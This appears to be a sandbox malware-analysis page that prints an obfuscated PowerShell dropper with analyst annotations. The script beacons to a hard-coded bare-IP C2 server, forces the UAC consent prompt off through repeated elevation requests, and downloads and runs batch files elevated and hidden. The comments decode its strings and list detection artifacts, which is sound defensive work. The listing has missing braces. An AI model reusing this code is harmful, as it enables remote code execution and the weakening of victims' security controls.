Static | ZeroBOX
No static analysis available.
# Analyst note: the literal is split with the filler token "ujkd"; .Replace() strips it at
# run time, so plain string matching for "http" or a URL in the script body finds nothing.
# Decoded (defanged): hxxp://157.173.104[.]153/up/ - plain HTTP to a bare IP address.
# Every network call in this listing is built by appending a name to this base.
$mainUri = "hujkdtujkdtujkdp:ujkd/ujkd/157.173.104.153/ujkduujkdpujkd/ujkdujkd".Replace("ujkd","");
# postRequest: sends $text as the body of an HTTP POST to $url.
#   $url  - destination; the visible callers pass $mainUri + "index.php".
#   $text - body, sent as-is. No URL-encoding is applied here, so the spaces and "!" in the
#           callers' status messages go on the wire literally (useful for network signatures).
# NOTE(review): the closing brace of this function is missing from the listing (apparently
# lost in extraction); the function is assumed to end at the GetResponse() line.
function postRequest($url,$text) {
$request = [System.Net.WebRequest]::Create($url);
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
# ASCII encoding: any non-ASCII character in $text is replaced with "?".
$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
# The response is requested but not read or closed in the visible code.
$request.GetResponse();
# gid: returns a per-host identifier string ($uid) that the callers send with every report.
# Lookup order, as written:
#   1. value "uid" under HKLM:\Software\Wireless (only read here; nothing in this listing writes it)
#   2. first 36 characters of %PUBLIC%\documents\id.log
#   3. a freshly generated GUID, which is then appended to that id.log
# Host artifacts for triage: the registry value and the id.log file named above.
# NOTE(review): the opening brace of the function and the closing braces of the if/else
# blocks are missing from the listing (apparently lost in extraction); nesting is inferred.
function gid
$regPath = "HKLM:\Software\Wireless"
# SilentlyContinue: a missing key or value yields $null instead of an error.
$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue
if ($null -ne $exist) {
$uid = (Get-ItemProperty $regPath -Name uid).uid
else {
$local = "$env:public\documents\id.log"
if (Test-Path $local) {
$uid = [IO.File]::readalltext($local)
# A GUID in default string form is 36 characters; this drops whatever follows it in the file.
$uid = $uid.Substring(0,36)
else {
$uid = ([System.Guid]::NewGuid()).ToString()
# Persist the new identifier so later runs take branch 2 and report the same id.
$uid >> $local
return $uid
# sdu: checks the UAC policy values and, if UAC is active, repeatedly tries to turn the
# admin consent prompt off, reporting the outcome to $mainUri + "index.php".
# The three strings below use the same filler-token/.Replace() obfuscation as $mainUri.
# Decoded:
#   $rtet44gg   = HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
#   $ruiibttew  = ConsentPromptBehaviorAdmin
#   $ruiibttew2 = EnableLUA
# Detection notes:
#   - The child process on the Start-process line receives the *decoded* path and value name,
#     because the double-quoted argument string expands the variables. Process-creation
#     logging with command lines therefore sees "Set-ItemProperty ... -Value 0 -Force" in clear.
#   - Registry auditing on the Policies\System key catches the write itself.
#   - The POST bodies contain the literal texts "UAC off in default!" / "UAC force disabled!".
# NOTE(review): sdu is not called anywhere in the visible listing. Closing braces are missing
# (apparently lost in extraction), so block ends - and how the while loop exits - are not visible.
function sdu () {
$rtet44gg = "Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\Wit3gjt50ndt3gjt50owt3gjt50s".Replace("t3gjt50","") + "i3bnoie4\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4".Replace("i3bnoie4","")
$ruiibttew = "Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro".Replace("y5tjogro","") + "Bu6gjoioehu6gjoioavu6gjoioiu6gjoioorAu6gjoiodmu6gjoioin".Replace("u6gjoio","")
$ruiibttew2 = "Ep8ITAwfno44jgnp8ITAwfno44jgablp8ITAwfno44jgeLp8ITAwfno44jgUp8ITAwfno44jgAp8ITAwfno44jg".Replace("p8ITAwfno44jg","")
# Read the current values of ConsentPromptBehaviorAdmin and EnableLUA.
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
# Either value already 0: nothing is changed, the host is only reported.
if ($val -eq 0 -or $val2 -eq 0) {
$uid = gid
$url = $mainUri + "index.php"
postRequest $url "uid=$uid&msg=UAC off in default!"
return
#disable force
while ($true) {
# Re-read both values on every pass to see whether the write below has taken effect.
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
if ($val -ne 0 -and $val2 -ne 0) {
# -verb RunAs requests elevation for a hidden PowerShell child; with UAC active this is
# expected to raise a consent prompt on each pass (every 500 ms) until one is accepted.
# Only ConsentPromptBehaviorAdmin is written; EnableLUA is read but never set here.
Start-process PowerShell -WindowStyle Hidden -verb RunAs -ArgumentList "Set-ItemProperty -Path $rtet44gg -Name $ruiibttew -Value 0 -Force"
Start-Sleep -m 500
else {
$uid = gid
$url = $mainUri + "index.php"
postRequest $url "uid=$uid&msg=UAC force disabled!"
# newDir: creates the directory $path if Test-Path reports that it does not exist.
# NOTE(review): not called anywhere in the visible listing; closing braces are missing
# (apparently lost in extraction).
function newDir($path) {
if ((Test-Path $path) -eq $false ) {
New-Item -ItemType Directory -Path $path
# schReg: downloads three batch files from the $mainUri base into %TEMP% and launches one
# of them elevated and hidden.
#   <base>trigger        -> %TEMP%\k1.bat
#   <base>scheduler-once -> %TEMP%\scheduler-once.bat   (the only one executed here)
#   <base>scheduler-rpt  -> %TEMP%\k2.bat
# The batch contents are not part of this listing. The names suggest scheduled-task
# registration that later runs k1.bat / k2.bat - presumably; confirm against the payloads.
# Detection notes: System.Net.WebClient downloads over plain HTTP from a bare IP, .bat files
# written to %TEMP% by powershell.exe, and an elevated hidden launch of a .bat from %TEMP%.
# NOTE(review): the closing brace is missing from the listing (apparently lost in extraction).
function schReg {
$url1 = $mainUri + "trigger"
$url2 = $mainUri + "scheduler-once"
$url3 = $mainUri + "scheduler-rpt"
$dst1 = $env:TEMP + "\k1.bat"
$dst2 = $env:TEMP + "\scheduler-once.bat"
$dst3 = $env:TEMP + "\k2.bat"
$WebClient = New-Object System.Net.WebClient
# DownloadFile writes to the destination path; no error handling is visible around these calls.
$WebClient.DownloadFile($url1,$dst1)
$WebClient.DownloadFile($url2,$dst2)
$WebClient.DownloadFile($url3,$dst3)
# -Verb RunAs requests elevation for the downloaded batch file.
Start-Process -FilePath $dst2 -Verb RunAs -WindowStyle Hidden
# action: entry routine - waits 300 ms, then runs schReg (download and launch stage).
# sdu and newDir are not invoked from here in the visible listing.
# NOTE(review): the closing brace is missing from the listing (apparently lost in extraction).
function action {
Start-Sleep -Milliseconds 300
schReg
# Script entry point: the only top-level call in the listing.
action
No antivirus signatures available.
No IRMA results available.